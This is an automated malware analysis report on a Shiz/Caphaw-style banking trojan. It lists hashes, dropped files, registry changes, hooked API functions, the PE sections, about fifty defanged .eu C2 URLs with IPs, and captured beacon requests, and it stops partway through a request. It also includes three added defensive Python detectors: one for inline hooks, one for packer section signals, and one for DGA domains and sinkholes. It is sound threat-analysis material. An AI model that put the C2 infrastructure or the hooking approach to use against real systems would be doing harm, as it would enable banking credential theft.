HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Razy.89444 (B) (Emsisoft), Gen:Variant.Razy.89444 (AdAware), Backdoor.Win32.Shiz.FD, Shiz.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 2691b3ba044ebaa82b18b8bef51b5705
SHA1: 77fb08ba6e496594b5176853682c43f5cd752e40
SHA256: 631d49f9e59d3a2220edda45d8f7bf1210f7e41a4e89e754a2920bdb3051c9d1
SSDeep: 6144:msBFm+fWQX6VpYlaC0H2FLaOyaeYeflemO+r4RmdT3hl/FTYSkN1:FrfWVWlngwLaFaZef1r4RYRl/Nj
Size: 279552 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: no certificate found
Created at: 1999-05-12 16:25:46
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:556
The Trojan injects its code into the following process(es):
Explorer.EXE:532
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:556 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\AppPatch\vkyeif.exe (1983 bytes)
%System%\config\software (2132 bytes)
%System%\config\SOFTWARE.LOG (4003 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (0 bytes)
Registry activity
The process %original file name%.exe:556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 7C 51 7F FE 80 59 3E 3E A6 CC 5E 62 8B E7 28"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%WinDir%\apppatch\vkyeif.exe_, \??\%WinDir%\apppatch\vkyeif.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"a8a67a25" = <binary value; the report renders it as unreadable mis-encoded text>
Dropped PE files
MD5 | File path |
---|---|
843388d7262acc62eb45be199012560d | c:\WINDOWS\AppPatch\vkyeif.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following user-mode hooks in CRYPT32.dll:
CertVerifyCertificateChainPolicy
The Trojan installs the following user-mode hooks in WININET.dll:
HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetWriteFileExA
InternetQueryDataAvailable
HttpSendRequestExW
InternetReadFile
HttpSendRequestA
InternetCloseHandle
The Trojan installs the following user-mode hooks in USER32.dll:
GetWindowTextA
GetClipboardData
SendInput
GetMessageA
GetMessageW
TranslateMessage
The Trojan installs the following user-mode hooks in ADVAPI32.dll:
CryptEncrypt
The Trojan installs the following user-mode hooks in WS2_32.dll:
WSASend
recv
gethostbyname
WSARecv
send
The Trojan installs the following user-mode hooks in kernel32.dll:
CreateFileW
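The hook set above is consistent with a banking trojan's man-in-the-browser setup: HttpSendRequest*/InternetReadFile/WSASend/recv see web traffic in the clear inside the browser process, CryptEncrypt sees data before it is encrypted, CertVerifyCertificateChainPolicy can be forced to accept a forged certificate, and GetClipboardData/SendInput/GetMessage expose keystrokes and clipboard contents. The following added example (not part of the Lavasoft report) shows how an anti-rootkit check finds such user-mode hooks: it compares an export's first bytes as mapped in the process with the clean bytes of the same DLL on disk and decodes whatever trampoline has been written over them. The module range, the function addresses, the prologue bytes and the "injected" target address are constructed for the example; the export names are taken from the hook list above but placed in one assumed module range.

```python
import struct
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

# Assumed 32-bit module range for the example (an XP SP3 DLL-sized image);
# on a real system these come from the target process's module list.
MODULE_BASE = 0x771B0000
MODULE_END = MODULE_BASE + 0x000B0000


@dataclass
class HookReport:
    export: str
    hooked: bool
    kind: Optional[str] = None
    target: Optional[int] = None
    outside_module: Optional[bool] = None


def decode_trampoline(addr: int, b: bytes) -> Tuple[str, Optional[int]]:
    """Recognise the redirect patterns user-mode hook engines write over a
    function's first bytes and return (kind, target)."""
    if b[:1] == b"\xE9" and len(b) >= 5:                      # jmp rel32
        return "jmp rel32", (addr + 5 + struct.unpack_from("<i", b, 1)[0]) & 0xFFFFFFFF
    if b[:1] == b"\xEB" and len(b) >= 2:                      # jmp rel8 (hot-patch slot style)
        return "jmp rel8", (addr + 2 + struct.unpack_from("<b", b, 1)[0]) & 0xFFFFFFFF
    if b[:2] == b"\xFF\x25" and len(b) >= 6:                  # jmp dword ptr [abs32]
        return "jmp [abs32]", struct.unpack_from("<I", b, 2)[0]
    if b[:1] == b"\x68" and b[5:6] == b"\xC3":                # push imm32 ; ret
        return "push/ret", struct.unpack_from("<I", b, 1)[0]
    if b[:1] == b"\xB8" and b[5:7] == b"\xFF\xE0":            # mov eax, imm32 ; jmp eax
        return "mov eax/jmp eax", struct.unpack_from("<I", b, 1)[0]
    return "modified prologue (unrecognised pattern)", None


def check_export(export: str, addr: int, in_memory: bytes, on_disk: bytes) -> HookReport:
    """Compare the export's prologue as mapped in the process with the clean
    bytes from the DLL on disk (same image base, relocations applied)."""
    if in_memory[:len(on_disk)] == on_disk:
        return HookReport(export, False)
    kind, target = decode_trampoline(addr, in_memory)
    outside = None if target is None else not (MODULE_BASE <= target < MODULE_END)
    return HookReport(export, True, kind, target, outside)


def scan(samples: Dict[str, Tuple[int, bytes]], clean: bytes) -> Dict[str, HookReport]:
    return {name: check_export(name, addr, mem, clean) for name, (addr, mem) in samples.items()}


def rel32(src: int, dst: int) -> bytes:
    """Displacement for a 5-byte jmp at src that lands on dst (wrap-safe)."""
    return struct.pack("<I", (dst - (src + 5)) & 0xFFFFFFFF)


# Constructed inputs. CLEAN is a typical hot-patchable prologue:
# mov edi,edi ; push ebp ; mov ebp,esp ; sub esp,10h
CLEAN = bytes.fromhex("8BFF558BEC83EC10")
INJECTED = 0x00A51000   # assumed address of code injected into Explorer.EXE
SAMPLES = {
    # export: (address, first 8 bytes read from the process)
    "CertVerifyCertificateChainPolicy": (0x771D1234, CLEAN),                                       # untouched
    "HttpSendRequestA": (0x771C4A20, b"\xE9" + rel32(0x771C4A20, INJECTED) + CLEAN[5:]),            # jmp rel32
    "InternetReadFile": (0x771C7F10, b"\x68" + struct.pack("<I", INJECTED + 0x40) + b"\xC3" + CLEAN[6:]),  # push/ret
    "InternetCloseHandle": (0x771E0010, b"\xEB\xF9" + CLEAN[2:]),                                   # jmp $-5 into hot-patch slot
}

if __name__ == "__main__":
    for rep in scan(SAMPLES, CLEAN).values():
        print(rep)
```

A jmp rel8 that stays inside the module (the last sample) is how Microsoft's own hot-patching works: the real redirect sits in the five bytes of padding before the function, so those bytes must be decoded as well before calling the function clean. Targets outside every loaded module's image range, as in the first two hooked samples, are the strongest signal, because injected code lives in heap or private memory rather than in a mapped DLL.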
Propagation
Removals
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:556
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\AppPatch\vkyeif.exe (1983 bytes)
%System%\config\software (2132 bytes)
%System%\config\SOFTWARE.LOG (4003 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: Unistylist
Product Name: wasteword
Product Version: 2.9.3.7
Legal Copyright: molinia
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.9.5.1
File Description: lowan
Comments:
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 96739 | 96768 | 5.49523 | 7c17123fa44e40214e4c18cdfd070c6c |
.TmyIJuZ | 102400 | 2412 | 2560 | 0 | a371492f16c0940507435909603efe88 |
.pLeW | 106496 | 631 | 1024 | 0 | 0f343b0931126a20f133d67c2b018a3b |
.ODkL | 110592 | 3919 | 4096 | 0 | 620f0b67a91f7f74151bc5be745b7110 |
.data | 114688 | 35229 | 7168 | 4.84649 | 6da91eef3b28e5903994e51835b0e9bf |
.iFtr | 151552 | 4555 | 4608 | 4.10161 | 85115f04f3e92b81d0652d258cb11ba7 |
.rdata | 159744 | 133123 | 133632 | 5.53439 | 4700b228beb21fbe9d8db21063f80e13 |
.sVZxM | 294912 | 3089 | 3584 | 0 | b4202f7fe985b9648b4676e6f70832bd |
.XSZcc | 299008 | 1863 | 2048 | 0 | c99a74c555371a433d121f551d6c6398 |
.rsrc | 303104 | 17464 | 17920 | 2.52651 | c298c9eed152c60b3c712244ba78f204 |
.NaKWH | 323584 | 2405 | 2560 | 0 | a371492f16c0940507435909603efe88 |
.ghVZOjc | 327680 | 1770 | 2048 | 0 | c99a74c555371a433d121f551d6c6398 |
.ueYo | 331776 | 436 | 512 | 0 | bf619eac0cdf3f68d496ea9344137e8b |
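Nine of the thirteen sections carry random names, eight have an entropy of exactly 0, and two pairs share a section MD5. The following added example (not part of the Lavasoft report) turns those table rows into a small packer triage: it computes Shannon entropy the way the table does, tests whether each zero-entropy section is literally NUL padding by hashing raw-size zero bytes and comparing against the table's MD5, and reports byte-identical sections. The rows are copied from the table above; the set of "standard" section names is the example's own assumption.

```python
import hashlib
import math
from collections import Counter, defaultdict

# Section names a compiler or linker normally emits (assumed list for the example).
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",
                     ".reloc", ".bss", ".tls", ".CRT", "CODE", "DATA", "BSS"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


# Rows copied from the PE Sections table above:
# (name, virtual size, raw size, entropy, section MD5)
SECTIONS = [
    (".text", 96739, 96768, 5.49523, "7c17123fa44e40214e4c18cdfd070c6c"),
    (".TmyIJuZ", 2412, 2560, 0, "a371492f16c0940507435909603efe88"),
    (".pLeW", 631, 1024, 0, "0f343b0931126a20f133d67c2b018a3b"),
    (".ODkL", 3919, 4096, 0, "620f0b67a91f7f74151bc5be745b7110"),
    (".data", 35229, 7168, 4.84649, "6da91eef3b28e5903994e51835b0e9bf"),
    (".iFtr", 4555, 4608, 4.10161, "85115f04f3e92b81d0652d258cb11ba7"),
    (".rdata", 133123, 133632, 5.53439, "4700b228beb21fbe9d8db21063f80e13"),
    (".sVZxM", 3089, 3584, 0, "b4202f7fe985b9648b4676e6f70832bd"),
    (".XSZcc", 1863, 2048, 0, "c99a74c555371a433d121f551d6c6398"),
    (".rsrc", 17464, 17920, 2.52651, "c298c9eed152c60b3c712244ba78f204"),
    (".NaKWH", 2405, 2560, 0, "a371492f16c0940507435909603efe88"),
    (".ghVZOjc", 1770, 2048, 0, "c99a74c555371a433d121f551d6c6398"),
    (".ueYo", 436, 512, 0, "bf619eac0cdf3f68d496ea9344137e8b"),
]


def zero_filled_sections(rows):
    """A zero-entropy section holds one repeated byte. If the MD5 of raw-size
    NUL bytes equals the table's hash, the section is pure zero padding."""
    return [name for name, _vs, rsize, ent, md5 in rows
            if ent == 0 and hashlib.md5(b"\x00" * rsize).hexdigest() == md5]


def triage_sections(rows):
    """Per-section findings: junk names, filler sections, duplicated content."""
    findings = []
    by_md5 = defaultdict(list)
    zero = set(zero_filled_sections(rows))
    for name, _vsize, _rsize, ent, md5 in rows:
        if name not in STANDARD_SECTIONS:
            findings.append((name, "non-standard section name"))
        if ent == 0:
            findings.append((name, "all-zero filler" if name in zero else "constant non-zero filler"))
        by_md5[md5].append(name)
    for md5, names in by_md5.items():
        if len(names) > 1:
            findings.append(("+".join(names), "byte-identical sections (md5 %s)" % md5))
    return findings


def packer_signals(rows):
    """The three numbers worth putting in a triage note."""
    return {"junk_named": sum(1 for r in rows if r[0] not in STANDARD_SECTIONS),
            "zero_entropy": sum(1 for r in rows if r[3] == 0),
            "max_entropy": max(r[3] for r in rows)}


if __name__ == "__main__":
    for name, msg in triage_sections(SECTIONS):
        print("%-18s %s" % (name, msg))
    print(packer_signals(SECTIONS))
```

Note what the numbers say: the highest per-section entropy is 5.53 (.rdata), which is ordinary code and data, not compressed or encrypted content. The "Packed" verdict is carried by the random section names and the duplicated zero-filled filler sections, which is the signature of a section-level obfuscator rather than a compressing packer such as UPX.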
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 2
68d8bfe848092a071135009607227f63
864a44f75a75096c4f24124dbbaf7014
Network Activity
URLs
URL | IP |
---|---|
hxxp://digivehusyd.eu/login.php | 69.195.129.70 |
hxxp://kemocujufys.eu/login.php | |
hxxp://xuxusujenes.eu/login.php | 208.100.26.234 |
hxxp://keraborigin.eu/login.php | 95.211.174.92 |
hxxp://qekenilacap.eu/login.php | |
hxxp://lysovidacyx.eu/login.php | 23.253.126.58 |
hxxp://tufecagemyl.eu/login.php | 23.253.126.58 |
hxxp://norumikemem.eu/login.php | 23.253.126.58 |
hxxp://lykemujebeq.eu/login.php | 23.253.126.58 |
hxxp://foxivusozuc.eu/login.php | 23.253.126.58 |
hxxp://vocakemenir.eu/login.php | 23.253.126.58 |
hxxp://ryqecolijet.eu/login.php | 23.253.126.58 |
hxxp://xuqohyxeqak.eu/login.php | 23.253.126.58 |
hxxp://kefuwidijyp.eu/login.php | 23.253.126.58 |
hxxp://puvybivihox.eu/login.php | 23.253.126.58 |
hxxp://jeluganusog.eu/login.php | 23.253.126.58 |
hxxp://lyvejujolec.eu/login.php | 23.253.126.58 |
hxxp://nozulufynax.eu/login.php | 23.253.126.58 |
hxxp://cihunemyror.eu/login.php | 23.253.126.58 |
hxxp://vofozymufok.eu/login.php | 23.253.126.58 |
hxxp://ryleryqacic.eu/login.php | 23.253.126.58 |
hxxp://nopegymozow.eu/login.php | 23.253.126.58 |
hxxp://rynazuqihoj.eu/login.php | 23.253.126.58 |
hxxp://xugiqonenuz.eu/login.php | 69.195.129.70 |
hxxp://pupujeguper.eu/login.php | 23.253.126.58 |
hxxp://fodakyhijyv.eu/login.php | 23.253.126.58 |
hxxp://ciliqikytec.eu/login.php | 23.253.126.58 |
hxxp://kevedorozup.eu/login.php | 23.253.126.58 |
hxxp://dimutobihom.eu/login.php | 23.253.126.58 |
hxxp://mamixikusah.eu/login.php | 23.253.126.58 |
hxxp://jewuqyjywyv.eu/login.php | 23.253.126.58 |
hxxp://qekikyvutic.eu/login.php | 23.253.126.58 |
hxxp://tucyguqaciq.eu/login.php | 23.253.126.58 |
hxxp://jefapexytar.eu/login.php | 23.253.126.58 |
hxxp://qeqinuqypoq.eu/login.php | 23.253.126.58 |
hxxp://xuqufyduras.eu/login.php | 23.253.126.58 |
hxxp://puregivytoh.eu/login.php | 23.253.126.58 |
hxxp://galokusemus.eu/login.php | 23.253.126.58 |
hxxp://gadufiwabim.eu/login.php | 23.253.126.58 |
hxxp://qetuluvolos.eu/login.php | 23.253.126.58 |
hxxp://ganycyhywek.eu/login.php | 23.253.126.58 |
hxxp://qebahilojam.eu/login.php | 23.253.126.58 |
hxxp://ryhuzilywax.eu/login.php | 23.253.126.58 |
hxxp://fokyxazolar.eu/login.php | 23.253.126.58 |
hxxp://qexofyqihid.eu/login.php | 23.253.126.58 |
hxxp://lyruxyxaxaw.eu/login.php | 23.253.126.58 |
hxxp://xukovoruput.eu/login.php | 23.253.126.58 |
hxxp://nojejecebuw.eu/login.php | 23.253.126.58 |
hxxp://marytymenok.eu/login.php | 23.253.126.58 |
hxxp://gatedyhavyd.eu/login.php | 23.253.126.58 |
www.bing.com | 204.79.197.200 |
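Two things in this network record are worth turning into checks. Every C2 hostname in the table is an 11-letter label with strictly alternating consonant/vowel classes under .eu, and the exchanges under Traffic show that almost all of them are answered by sinkholes (an X-Malware-Sinkhole header from Arbor Networks, or a Server: sinkhole header from sinkhole.tech), while digivehusyd.eu alone returns a 200 with a session cookie and no sinkhole marker. The following added example (not part of the Lavasoft report) implements that triage: a hostname-shape filter for hunting in DNS logs, a parser for the report's request/response text that separates sinkholed hosts from live candidates, and a check for the impossible User-Agent the sample sends (MSIE 2.0 combined with Trident/4.0, a token that first shipped with IE8). The capture string is constructed from three exchanges in the Traffic section with some headers dropped; the vowel set and the "standard" UA rule are the example's own assumptions.

```python
import re

VOWELS = set("aeiouy")


def looks_like_dga(host: str) -> bool:
    """Shape shared by every C2 hostname in this report's URL table: an
    11-letter label with strictly alternating consonant/vowel classes under
    .eu. A hunting filter, not a verdict; corroborate with the response triage."""
    label, _, tld = host.lower().rpartition(".")
    if tld != "eu" or len(label) != 11 or not label.isalpha():
        return False
    cls = [ch in VOWELS for ch in label]
    return all(cls[i] != cls[i + 1] for i in range(10))


def ua_inconsistent(ua: str) -> bool:
    """The Trident/ token appeared with IE8 (Trident/4.0) and is never paired
    with an MSIE version below 7 by a real browser, so such a UA is forged."""
    m = re.search(r"MSIE (\d+)\.\d+", ua)
    return bool(m) and "Trident/" in ua and int(m.group(1)) < 7


REQ_RE = re.compile(r"^(GET|POST) (\S+) HTTP/1\.[01]$")
RESP_RE = re.compile(r"^HTTP/1\.[01] (\d{3})\b")
HDR_RE = re.compile(r"^([A-Za-z][\w-]*): ?(.*)$")


def parse_exchanges(capture: str):
    """Split the report's request/response text into one dict per request."""
    out, cur = [], None
    for line in capture.splitlines():
        m = REQ_RE.match(line)
        if m:
            cur = {"method": m.group(1), "path": m.group(2), "status": None,
                   "req": {}, "resp": [], "host": None, "sinkhole": None}
            out.append(cur)
            continue
        if cur is None:
            continue
        m = RESP_RE.match(line)
        if m:
            cur["status"] = int(m.group(1))
            continue
        m = HDR_RE.match(line)
        if not m:
            continue                      # request body or chunked payload line
        key, val = m.group(1).lower(), m.group(2)
        if cur["status"] is None:
            cur["req"][key] = val
        else:
            cur["resp"].append((key, val))   # list: Server may appear twice
    for ex in out:
        ex["host"] = ex["req"].get("host")
        for key, val in ex["resp"]:
            if key == "x-malware-sinkhole":
                ex["sinkhole"] = val
            elif key == "server" and val.lower() == "sinkhole":
                ex["sinkhole"] = ex["sinkhole"] or "Server: sinkhole"
    return out


def candidate_c2(capture: str):
    """Hosts that answered 2xx with no sinkhole marker: block and hunt these first."""
    return sorted({ex["host"] for ex in parse_exchanges(capture)
                   if ex["status"] is not None and 200 <= ex["status"] < 300
                   and not ex["sinkhole"]})


# Constructed sample: three exchanges copied from the Traffic section, abridged.
CAPTURE = """\
POST /login.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kefuwidijyp.eu
Content-Length: 9
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Host: digivehusyd.eu
Content-Length: 9
....~7.~'
HTTP/1.1 200 OK
Connection: close
Set-Cookie: jsessionid=e6e6275c4b3ed34f5a86d53b80e7c8a3; Expires=Fri, 01 Sep 2023 17:41:33 GMT
Content-Length: 0
Content-Type: text/plain; charset=utf-8
POST /login.php HTTP/1.1
Host: keraborigin.eu
Content-Length: 9
....~7.~'
HTTP/1.1 200 OK
Server: nginx
Transfer-Encoding: chunked
Server: sinkhole
51
sinkhole-01.sinkhole.tech - where the bots party hard and the researchers harder...
0
"""

if __name__ == "__main__":
    for ex in parse_exchanges(CAPTURE):
        print(ex["host"], ex["status"], ex["sinkhole"] or "-",
              "dga-like" if looks_like_dga(ex["host"]) else "")
    print("candidate C2:", candidate_c2(CAPTURE))
```

A 404 from a sinkhole still means the host resolved to infrastructure that researchers took over, so the domain is an indicator of infection even though it yields nothing to the bot; the only host to treat as potentially live at analysis time is the one that set a jsessionid cookie. The User-Agent check is the cheapest network-side detection here, since no browser produces that token combination.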
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kefuwidijyp.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryqecolijet.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryhuzilywax.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:57 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: foxivusozuc.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qetuluvolos.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:58 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: mamixikusah.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: mamixikusah.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nozulufynax.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:42:11 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: fodakyhijyv.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:46 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyvejujolec.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:33 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: digivehusyd.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 200 OK
Connection: close
Set-Cookie: jsessionid=e6e6275c4b3ed34f5a86d53b80e7c8a3; Expires=Fri, 01 Sep 2023 17:41:33 GMT
Date: Fri, 02 Sep 2016 17:41:33 GMT
Content-Length: 0
Content-Type: text/plain; charset=utf-8
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: rynazuqihoj.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:37 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: pupujeguper.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xukovoruput.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:53 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qebahilojam.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:48 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lysovidacyx.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
